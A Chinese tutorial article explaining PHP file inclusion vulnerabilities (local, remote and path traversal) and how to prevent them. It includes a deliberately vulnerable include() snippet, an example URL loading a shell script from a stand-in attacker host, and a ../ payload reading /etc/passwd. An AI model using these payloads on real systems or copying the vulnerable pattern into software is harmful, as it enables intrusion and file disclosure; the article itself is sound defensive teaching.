PHP文件包含漏洞类型有哪些?
时间:2026-02-27 10:29:40 476浏览 收藏
PHP文件包含漏洞是Web安全中高危且常见的威胁,主要因开发者未严格过滤用户输入而导致,涵盖本地文件包含(LFI)、远程文件包含(RFI)和目录遍历三类攻击形式——攻击者可借此读取服务器敏感文件(如/etc/passwd、配置文件)、注入并执行恶意代码,甚至完全控制网站;而防范的核心在于彻底摒弃对用户输入的信任,通过白名单机制、禁用allow_url_include、严格路径校验、避免动态拼接文件名等多重防御手段构建安全防线,每一条看似简单的开发规范,都可能成为阻止一次致命入侵的关键屏障。

PHP 文件包含漏洞主要源于开发者在代码中动态引入文件时,未对用户输入进行严格过滤,导致攻击者可以包含恶意文件或敏感系统文件。这类漏洞分为以下几种类型:
1. 本地文件包含(LFI - Local File Inclusion)
说明:当 PHP 脚本使用 include、require、include_once 或 require_once 包含本地服务器上的文件,而文件路径由用户控制时,可能被利用读取服务器上的任意文件。
常见利用方式:
- 读取敏感配置文件,如 /etc/passwd、config.php
- 配合文件上传漏洞执行任意代码
- 通过日志文件写入 PHP 代码,再包含执行(如访问日志、错误日志)
示例代码(存在漏洞):
$filename = $_GET['file'];include($filename . '.php');
2. 远程文件包含(RFI - Remote File Inclusion)
说明:当 PHP 配置允许远程文件包含(allow_url_include=On),且程序动态包含外部 URL 时,攻击者可指定恶意远程脚本地址,导致任意代码执行。
前提条件:
- allow_url_include = On(默认关闭)
- 输入未过滤,直接用于包含语句
示例利用:
http://example.com/index.php?file=http://attacker.com/shell.txt若目标服务器允许远程包含,就会加载并执行攻击者服务器上的脚本。
3. 目录遍历(Path Traversal)与 LFI 结合
说明:攻击者使用 ../ 绕过目录限制,访问上级目录中的敏感文件。
示例:
http://example.com/page.php?page=../../../../etc/passwd若未做路径校验,可能导致系统文件泄露。
如何防范文件包含漏洞?
- 避免将用户输入直接用于文件包含路径
- 使用白名单机制限定可包含的文件名
- 关闭危险配置:设置 allow_url_include=Off 和 allow_url_fopen=Off(如非必要)
- 对输入进行严格过滤和验证,如去除特殊字符、限制路径格式
- 使用固定映射代替直接文件名拼接,例如:
$pages = ['home' => 'home.php', 'about' => 'about.php'];
根据输入选择对应值,而非直接拼接
基本上就这些。关键在于不信任用户输入,尤其是用在文件操作中的参数。
到这里,我们也就讲完了《PHP文件包含漏洞类型有哪些?》的内容了。个人认为,基础知识的学习和巩固,是为了更好的将其运用到项目中,欢迎关注golang学习网公众号,带你了解更多关于php,文件包含漏洞的知识点!
相关阅读
更多>
-
501 收藏
-
501 收藏
-
501 收藏
-
501 收藏
-
501 收藏
最新阅读
更多>
-
411 收藏
-
285 收藏
-
293 收藏
-
448 收藏
-
148 收藏
-
448 收藏
-
445 收藏
-
411 收藏
-
404 收藏
-
471 收藏
-
320 收藏
-
494 收藏
课程推荐
更多>
-
- 前端进阶之JavaScript设计模式
- 设计模式是开发人员在软件开发过程中面临一般问题时的解决方案,代表了最佳的实践。本课程的主打内容包括JS常见设计模式以及具体应用场景,打造一站式知识长龙服务,适合有JS基础的同学学习。
- 立即学习 543次学习
-
- GO语言核心编程课程
- 本课程采用真实案例,全面具体可落地,从理论到实践,一步一步将GO核心编程技术、编程思想、底层实现融会贯通,使学习者贴近时代脉搏,做IT互联网时代的弄潮儿。
- 立即学习 516次学习
-
- 简单聊聊mysql8与网络通信
- 如有问题加微信:Le-studyg;在课程中,我们将首先介绍MySQL8的新特性,包括性能优化、安全增强、新数据类型等,帮助学生快速熟悉MySQL8的最新功能。接着,我们将深入解析MySQL的网络通信机制,包括协议、连接管理、数据传输等,让
- 立即学习 500次学习
-
- JavaScript正则表达式基础与实战
- 在任何一门编程语言中,正则表达式,都是一项重要的知识,它提供了高效的字符串匹配与捕获机制,可以极大的简化程序设计。
- 立即学习 487次学习
-
- 从零制作响应式网站—Grid布局
- 本系列教程将展示从零制作一个假想的网络科技公司官网,分为导航,轮播,关于我们,成功案例,服务流程,团队介绍,数据部分,公司动态,底部信息等内容区块。网站整体采用CSSGrid布局,支持响应式,有流畅过渡和展现动画。
- 立即学习 485次学习